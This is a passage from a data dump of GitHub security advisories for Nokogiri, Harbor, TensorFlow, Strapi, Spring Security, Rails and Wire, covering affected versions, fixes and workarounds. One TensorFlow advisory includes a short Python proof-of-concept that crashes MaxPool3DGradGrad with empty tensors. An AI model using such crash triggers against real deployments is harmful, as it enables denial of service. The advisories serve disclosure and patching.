'https://nvd.nist.gov/vuln/detail/CVE-2020-7639'}, {'type': 'WEB', 'url': 'https://github.com/eivindfjeldstad/dot/commit/774e4b0c97ca35d2ae40df2cd14428d37dd07a0b'}, {'type': 'PACKAGE', 'url': 'https://github.com/eivindfjeldstad/dot'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-EIVIFJDOT-564435'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-09-07T23:58:45Z', 'nvd_published_at': '2020-04-06T13:15:00Z'}" +1.4.0,GHSA-7rrm-v45f-jp64,2023-07-07T17:19:15Z,2021-05-17T20:52:05Z,,[],Nokogiri updates packaged dependency on libxml2 from 2.9.10 to 2.9.12,"### Summary + +Nokogiri v1.11.4 updates the vendored libxml2 from v2.9.10 to v2.9.12 which addresses: + +- [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) (Medium severity) +- [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) (Medium severity) +- [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) (Medium severity) +- [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) (Medium severity) +- [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) (Low severity) +- [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) (Low severity) + +Note that two additional CVEs were addressed upstream but are not relevant to this release. [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) via `xmllint` is not present in Nokogiri, and [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) has been patched in Nokogiri since v1.10.8 (see #1992). + +Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.11.4`, and only if the packaged version of libxml2 is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements. + + +### Mitigation + +Upgrade to Nokogiri `>= 1.11.4`. + + +### Impact + +I've done a brief analysis of the published CVEs that are addressed in this upstream release. The libxml2 maintainers have not released a canonical set of CVEs, and so this list is pieced together from secondary sources and may be incomplete. + +All information below is sourced from [security.archlinux.org](https://security.archlinux.org), which appears to have the most up-to-date information as of this analysis. + +#### [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) + +- **Severity**: Medium +- **Type**: Denial of service +- **Description**: A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service. +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/7ffcd44d7e6c46704f8af0321d9314cd26e0e18a + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. + + +#### [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) + +- **Severity**: Medium +- **Type**: Denial of service +- **Description**: xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c8907645d2e155f0d89d4d9895ac5112b5 + +This has been patched in Nokogiri since v1.10.8 (see #1992). + + +#### [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) + +- **Severity**: Medium +- **Type**: Information disclosure +- **Description**: GNOME project libxml2 <= 2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/50f06b3efb638efb0abd95dc62dca05ae67882c2 + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. + + +#### [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) + +- **Severity**: Medium +- **Type**: Arbitrary code execution (no remote vector) +- **Description**: A use-after-free security issue was found libxml2 before version 2.9.11 when ""xmllint --html --push"" is used to process crafted files. +- **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/230 +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539 + +Verified that the fix commit first appears in v2.9.11. This vector does not exist within Nokogiri, which does not ship `xmllint`. + + +#### [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) + +- **Severity**: Medium +- **Type**: Arbitrary code execution +- **Description**: A heap-based buffer overflow was found in libxml2 before version 2.9.11 when processing truncated UTF-8 input. +- **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/235 +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. + + +#### [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) + +- **Severity**: Medium +- **Type**: Arbitrary code execution +- **Description**: A use-after-free security issue was found in libxml2 before version 2.9.11 in xmlXIncludeDoProcess() in xinclude.c when processing crafted files. +- **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/237 +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1098c30a040e72a4654968547f415be4e4c40fe7 + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. + + +#### [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) + +- **Severity**: Low +- **Type**: Denial of service +- **Description**: It was found that libxml2 before version 2.9.11 did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. +- **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/243 +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61 + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. + + +#### [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) + +- **Severity**: Low +- **Type**: Denial of service +- **Description**: A security issue was found in libxml2 before version 2.9.11. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service. +- **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e + +Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4, however Nokogiri's default parse options prevent the attack from succeeding (it is necessary to opt into `DTDLOAD` which is off by default). + +For more details supporting this analysis of this CVE, please visit #2233. +",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'nokogiri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-7rrm-v45f-jp64'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3541'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/nokogiri/commit/9b90a8854f74b5f672a437ba0043a503bc259d1b'}, {'type': 'PACKAGE', 'url': 'https://github.com/sparklemotion/nokogiri'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T19:10:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-jr34-mff8-pc6f,2021-05-04T22:00:21Z,2021-05-18T18:27:36Z,,['CVE-2019-19029'],SQL Injection in Cloud Native Computing Foundation Harbor,Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.8.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19029'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2019-19029'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:00:21Z', 'nvd_published_at': '2020-03-20T03:15:00Z'}" +1.4.0,GHSA-828x-qc2p-wprq,2021-05-18T18:34:21Z,2021-05-21T14:26:10Z,,['CVE-2021-29574'],Undefined behavior in `MaxPool3DGradGrad`,"### Impact +The implementation of `tf.raw_ops.MaxPool3DGradGrad` exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: + +```python +import tensorflow as tf + +orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) +orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) +grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) +ksize = [1, 1, 1, 1, 1] +strides = [1, 1, 1, 1, 1] +padding = ""SAME"" + +tf.raw_ops.MaxPool3DGradGrad( + orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, + strides=strides, padding=padding) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/72fe792967e7fd25234342068806707bbc116618/tensorflow/core/kernels/pooling_ops_3d.cc#L679-L703) fails to validate that the 3 tensor inputs are not empty. If any of them is empty, then accessing the elements in the tensor results in dereferencing a null pointer. + +### Patches +We have patched the issue in GitHub commit [a3d9f9be9ac2296615644061b40cefcee341dcc4](https://github.com/tensorflow/tensorflow/commit/a3d9f9be9ac2296615644061b40cefcee341dcc4). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-828x-qc2p-wprq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29574'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a3d9f9be9ac2296615644061b40cefcee341dcc4'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:34:21Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-7frv-9phw-vrvr,2023-09-13T19:20:18Z,2021-05-10T18:43:59Z,,['CVE-2020-27664'],Authorization bypass in Strapi,`admin/src/containers/InputModalStepperProvider/index.js` in Strapi before 3.2.5 has unwanted `/proxy?url=` functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27664'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/8442'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v3.2.5'}]","{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T18:06:14Z', 'nvd_published_at': '2020-10-22T19:15:00Z'}" +1.4.0,GHSA-gq28-h5vg-8prx,2021-08-31T21:18:55Z,2021-05-10T15:22:39Z,,['CVE-2021-22112'],Privilege escalation in spring security,"Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22112'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-security'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/releases/tag/5.4.4'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2cb05e499807900ba23e539643eead9c5f0652fd271f223f89da1804@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37423ec7eea340e92a409452c35b649dce02fdc467f0b3f52086c177@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r413e380088c427f56102968df89ef2f336473e1b56b7d4b3a571a378@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra6389b1b82108a3b6bbcd22979f7665fd437c2a3408c9509a15a9ca1@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/redbd004a503b3520ae5746c2ab5e93fd7da807a8c128e60d2002cd9b@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22112'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-02-19/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/02/19/7'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:12:05Z', 'nvd_published_at': '2021-02-23T19:15:00Z'}" +1.4.0,GHSA-7wjx-3g7j-8584,2023-08-08T16:06:25Z,2021-05-05T19:49:12Z,,['CVE-2021-22904'],Possible DoS Vulnerability in Action Controller Token Authentication,"There is a possible DoS vulnerability in the Token Authentication logic in Action Controller. + +Versions Affected: >= 4.0.0 +Not affected: < 4.0.0 +Fixed Versions: 6.1.3.2, 6.0.3.7, 5.2.4.6, 5.2.6 + +Impact +------ +Impacted code uses `authenticate_or_request_with_http_token` or `authenticate_with_http_token` for request authentication. Impacted code will look something like this: + +``` +class PostsController < ApplicationController + before_action :authenticate + + private + + def authenticate + authenticate_or_request_with_http_token do |token, options| + # ... + end + end +end +``` + +All users running an affected release should either upgrade or use one of the workarounds immediately. + +Releases +-------- +The fixed releases are available at the normal locations. + +Workarounds +----------- +The following monkey patch placed in an initializer can be used to work around the issue: + +```ruby +module ActionController::HttpAuthentication::Token + AUTHN_PAIR_DELIMITERS = /(?:,|;|\t)/ +end +``` + +Patches +------- +To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. + +* 5-2-http-authentication-dos.patch - Patch for 5.2 series +* 6-0-http-authentication-dos.patch - Patch for 6.0 series +* 6-1-http-authentication-dos.patch - Patch for 6.1 series + +Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. + +Credits +------- +Thank you to https://hackerone.com/wonda_tea_coffee for reporting this issue!","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.6'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.3.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.3.1'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.5'}, {'fixed': '5.2.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.2.4.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22904'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1101125'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2021-22904-possible-dos-vulnerability-in-action-controller-token-authentication/77869'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v5.2.4.6'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v5.2.6'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.0.3.7'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.1.3.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22904.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/Pf1TjkOBdyQ'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210805-0009/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:48:31Z', 'nvd_published_at': '2021-06-11T16:15:00Z'}" +1.4.0,GHSA-4hvv-7x94-7vq8,2021-05-17T21:19:51Z,2021-05-21T14:28:47Z,,['CVE-2021-29616'],Null dereference in Grappler's `TrySimplify`,"### Impact +The implementation of [`TrySimplify`](https://github.com/tensorflow/tensorflow/blob/c22d88d6ff33031aa113e48aa3fc9aa74ed79595/tensorflow/core/grappler/optimizers/arithmetic_optimizer.cc#L390-L401) has undefined behavior due to dereferencing a null pointer in corner cases that +result in optimizing a node with no inputs. + +### Patches +We have patched the issue in GitHub commit [e6340f0665d53716ef3197ada88936c2a5f7a2d3](https://github.com/tensorflow/tensorflow/commit/e6340f0665d53716ef3197ada88936c2a5f7a2d3). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4hvv-7x94-7vq8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29616'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e6340f0665d53716ef3197ada88936c2a5f7a2d3'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:19:51Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-hpw7-3vq3-mmv6,2021-05-19T19:38:22Z,2021-05-19T23:02:38Z,,['CVE-2021-29508'],Insecure deserialization in Wire,"Due to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end. + +**This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019** + +This also applies to the fork of Wire, AkkaDotNet/Hyperion. + + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Wire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/AsynkronIT/Wire/security/advisories/GHSA-hpw7-3vq3-mmv6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29508'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Wire/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:38:22Z', 'nvd_published_at': '2021-05-11T17:15:00Z'}" +1.4.0,GHSA-pmpr-55fj-r229,2021-05-17T22:33:22Z,2021-05-21T14:27:58Z,,['CVE-2021-29598'],Division by zero in TFLite's implementation of `SVDF`,"### Impact +The implementation of the `SVDF` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/7f283ff806b2031f407db64c4d3edcda8fb9f9f5/tensorflow/lite/kernels/svdf.cc#L99-L102): + +```cc +const int rank = params->rank; +... +TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); +``` + +An attacker can craft a model such that `params->rank` would be 0. + +### Patches +We have patched the issue in GitHub commit [6841e522a3e7d48706a02e8819836e809f738682](https://github.com/tensorflow/tensorflow/commit/6841e522a3e7d48706a02e8819836e809f738682). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 